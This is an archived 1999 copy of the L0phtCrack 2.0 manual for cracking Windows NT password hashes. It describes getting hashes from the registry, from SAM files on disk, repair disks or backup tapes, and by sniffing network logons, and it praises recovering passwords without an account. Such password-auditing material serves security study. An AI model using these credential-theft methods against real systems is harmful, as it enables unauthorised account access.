what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

l0phtcrack.readme.txt

l0phtcrack.readme.txt
Posted Aug 17, 1999

No information is available for this file.

tags | cracker
SHA-256 | b8c416515d3b21d4af45ce1c05927d9be8ca421b0d4ffc1e80e3db4e3ad69e85

l0phtcrack.readme.txt

Change Mirror Download
                                 L0phtCrack 2.0 Manual 

Introduction

L0phtCrack is designed to recover passwords for Windows NT. NT does not store the
actual passwords on an NT Domain Controller or Workstation. Instead it stores a
cryptographic hash of the passwords. L0phtCrack can take the hashes of passwords
and generate the cleartext passwords from them.

Password are computed using 2 different methods. The first, a dictionary lookup,
called dictionary cracking, uses a user supplied dictionary file. The password hashes
for all of the words in the dictionary file are computed and compared against all of
the password hashes for the users. When there is a match the password is known.
This method is extremely fast. Thousands of users can be checked with a 100,000
word dictionary file in just a few minutes on a PPro 200. The drawback to this method
is that it only finds very simple passwords.

The second method is the brute force computaion. This method uses a particular
character set such as A-Z or A-Z plus 0-9 and computes the hash for every
possible password made up of those characters. This method will always compute
the password if it is made up of the character set you have selected to test. The only
downside to this method is time. It is a very computation intensive and the larger the
character set the longer it takes. The character set A-Z takes about 24 hours on a
PPro 200. A-Z and 0-9 takes about 10 days.

Many of L0phtCracks features are designed to make these long brute force
computations feasible. It takes advantage of multiprocessor machines and runs with
lower than normal priority so you can use it on servers that have idle CPU. It can
save and restore its state during a brute force computation so that previously
computed work is not lost. L0phtCrack will automatically save its state every 5
minutes in case of power loss or reboots. The saved .LC file is in ASCII so it can be
inspected over the network to check on progress.

Installation

Unzip the distribution archive, lc2exe.zip into a directory. Create a shortcut to the
executable l0phtcrack.exe (or l0phtcrack95.exe for Win95) and you are done unless
you want to use the network sniffing feature.

To do network sniffing you need install an NDIS network driver. This driver will only
work on ethernet network devices. Go to the Network settings in the Control Panel.
Select the Protocols tab and press the Add.. button. Press Have Disk... and specify
the directory where you installed L0phtCrack. This is where the Oemsetup.inf file is.
You will need to restart before the new driver takes effect.

Accessing the Password Hashes

Before the passwords can be computed you need to retrieve the password hashes.
There are 3 main methods to get the password hashes: from the registry directly, from
a SAM file on disk, or by sniffing the network.

Dumping From the Registry

If you have administrator priviledges you can get the password hashes using the
'Tools Dump Passwords form Registry' command. Specify a computername or IP
address in the format \\computername or \\ipaddress. NT can be configured to
disallow access to the registry remotely over the network so you may need to be on
the local machine if this is the case. Microsoft introduced the SYSKEY utility in NT
SP3. If SYSKEY is running the password hashes are encrypted and cannot be
retrieved in this manner.

If you are using a non-english language version of NT your version may use a
different word for Administrators. If so you need to modify a registry key to get Dump
Passwords to work. Run regedit.exe and edit the value of the key:

HKEY_CURRENT_USER\Software\LHI\L0phtCrack\AdminGroupName

Set it to your language version of 'Administrators'.

Extracting From a SAM File

The next method is new for L0phtCrack 2.0. You can retrieve the password hashes
from the SAM file on the hard disk, from an NT Emergency Repair Disk, or from a
backup tape. The NT registry is actually stored in several different files on the
system disk in the d:\winnt\system32\config directory.

These files cannot be accessed while NT is running since they are opened
exlusively by the operating system. If you have physical access you can boot the
machine with a DOS floppy and use a program such as NTFSDOS
(http://www.ntinternals.com/ntfs20r.zip) to copy the SAM file from
d:\winnt\system32\config to a floppy disk. You can then use the L0phtCrack
command 'File Import SAM' to extract the password hashes from the SAM file.

Another place to find the SAM file that doesn't require rebooting the machine is in
the d:\winnt\repair directory or on an Emergency Repair floppy disk. Whenever a
repair disk is made the contents of the SAM in the registry is saved and compressed
into the file 'sam._'. This file can be uncompressed with the command:

expand sam._ sam

The expanded SAM file can be imported into L0phtCrack.

The SAM file is also backed up onto tape when a full backup is performed. If you
have access to a backup tape you can restore the SAM file from
d:\winnt\system32\config to another machine and import it into L0phtCrack.

If SYSKEY from NT 4.0 SP3 is installed all of the SAM files are encrypted and cannot
be read by L0phtCrack.

Sniffing on the Network

If SYSKEY is installed and you have no network access to the registry or physical
access don't fret. There is a 3rd method for obtaining the password hashes, network
sniffing. Network sniffing requires that you are on a physical segment of the user or
the resource they are accessing. The sniffer, readsmb.exe, included with L0phtCrack
2.0 will only work on Windows NT 4.0.

Follow the instructions in the Install section for installing the network driver
necessary for using the network sniffer.

The network sniffer is a command line program named readsmb.exe. Run it and
redirect its output to a file with the command:

readsmb > passwd

You probably want to let this run for a day or so to collect enough password hashes.
You can then open this file into L0phtCrack using the command File Open.

Readsmb.exe also has a verbose mode that can be enabled by using the -v
command: readsmb -v This output is not formatted properly for opening with
L0phtCrack but it may be useful to you. On slow machines the -v option may cause
readsmb to miss some packets so it is really just for debugging and exploring.

Computing Passwords

So now that you have the password hashes loaded into L0phtCrack you want to
start computing. You start computing by using the command Tools Run. The default
options are set to first run a dictionary computation using the default dictionary,
words-english that comes with the L0phtCrack distribution and then run a Brute
Force computation using the default character set, A-Z.

L0phtCrack will save the state of the computation every 5 minutes to a .LC file.

The Tools Options menu command lets you select whether you want to do a
dictionary attack and/or brute force attack

Performance

Dictionary cracking is extremely fast. L0phtCrack running on a Pentium Pro 200
checked a password file with 100 passwords against a 8 Megabyte dictionary file in
under one minute.

Brute forcing is always an extremely CPU intensive operation. We have worked to
optimize this in L0phtCrack 2.0. L0phtCrack running on a Pentium Pro 200 checked a
password file with 10 passwords using the alpha character set (A-Z) in 26 hours.
L0phtCrack features a percentage done counter and a time remaining estimate so
you can gauge when the task will be complete.

L0phtCrack allows you to select one of 5 character sets to brute force passwords
that use more characters than A-Z. As the character sets increase in size from 26
characters to 68 the time to brute force the password increases exponentially.

This chart illustrates the relative time for larger character sets.

Char Relative
Size Iterations Time

26 8353082582 1.00
36 80603140212 9.65
46 4.45502E+11 53.33
68 6.82333E+12 816.86

So if 26 characters takes 26 hours to complete, 36 characters (A-Z,0-9) would take
250 hours or 10.5 days. Now of course this is the worst case senario of the password
being 99999999999999. A password such as take2asp1r1n would probably be
computed in about 7 days.

Technical Notes - NT Server Challenge Sniffing

Here is a description of the challenge that takes place over the network when a
client, such as a Windows 95 machine, connects to an NT Server.

[assuming initial setup etc...]

8byte "random" challenge
Client <---------------------- Server
OWF1 = pad Lanman OWF with 5 nulls
OWF2 = pad NT OWF with 5 nulls
resp = E(OWF1, Chal) E(OWF2, Chal)
48byte response (24byte lanman 24byte nt)
Client -----------------------> Server

The client takes the OWF ( all 16 bytes of it) and pads with 5 nulls. From this point it
des ecb encrypts the, now 21byte, OWF with the 8byte challenge. The resulting
24byte string is sent over to the server who performs the same operations on the
OWF stored in it's registry and compares the resulting two 24byte strings. If they
match the user used the correct passwd.

What's cool about this? Well, now you can take your sniffer logs of NT logons and
retrieve the plaintext passwords. This does not require an account on the NT
machine nor does it require previous knowledge of the ADMINISTRATOR password.

So even if you have installed Service Pack 3 and enabled SAM encryption your
passwords are still vulnerable if they go over the network.

Acknoledgements

Special thanks go out to:

- Dmitry Andrianov for providing the SAMDUMP code for inclusion

- Eric Young (eay@mincom.oz.au) for much of the cypto lib code

- MD4 Algorithm is "RSA Data Security, Inc. MD4 Message-Digest Algorithm" this
program is derived from the RSA Data Security, Inc. MD4 Message-Digest Algorithm

- Thank you anonymous for some LANMAN sorting code

- Hobbit@avian.org for all the cool ideas and bare feet. Especially for his monster
paper on CIFS problems.

- Jeremey Allison jra@cygnus.com - for the fantastic sleuthing with PWDump.

- tuebor@l0pht.com for a some nice little code tips and general coolness.

- the people who did SAMBA for being nuts!

- the people who did libdes for being nuts!

- Tweety FIsh for designing a rad logo for L0phtCrack
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close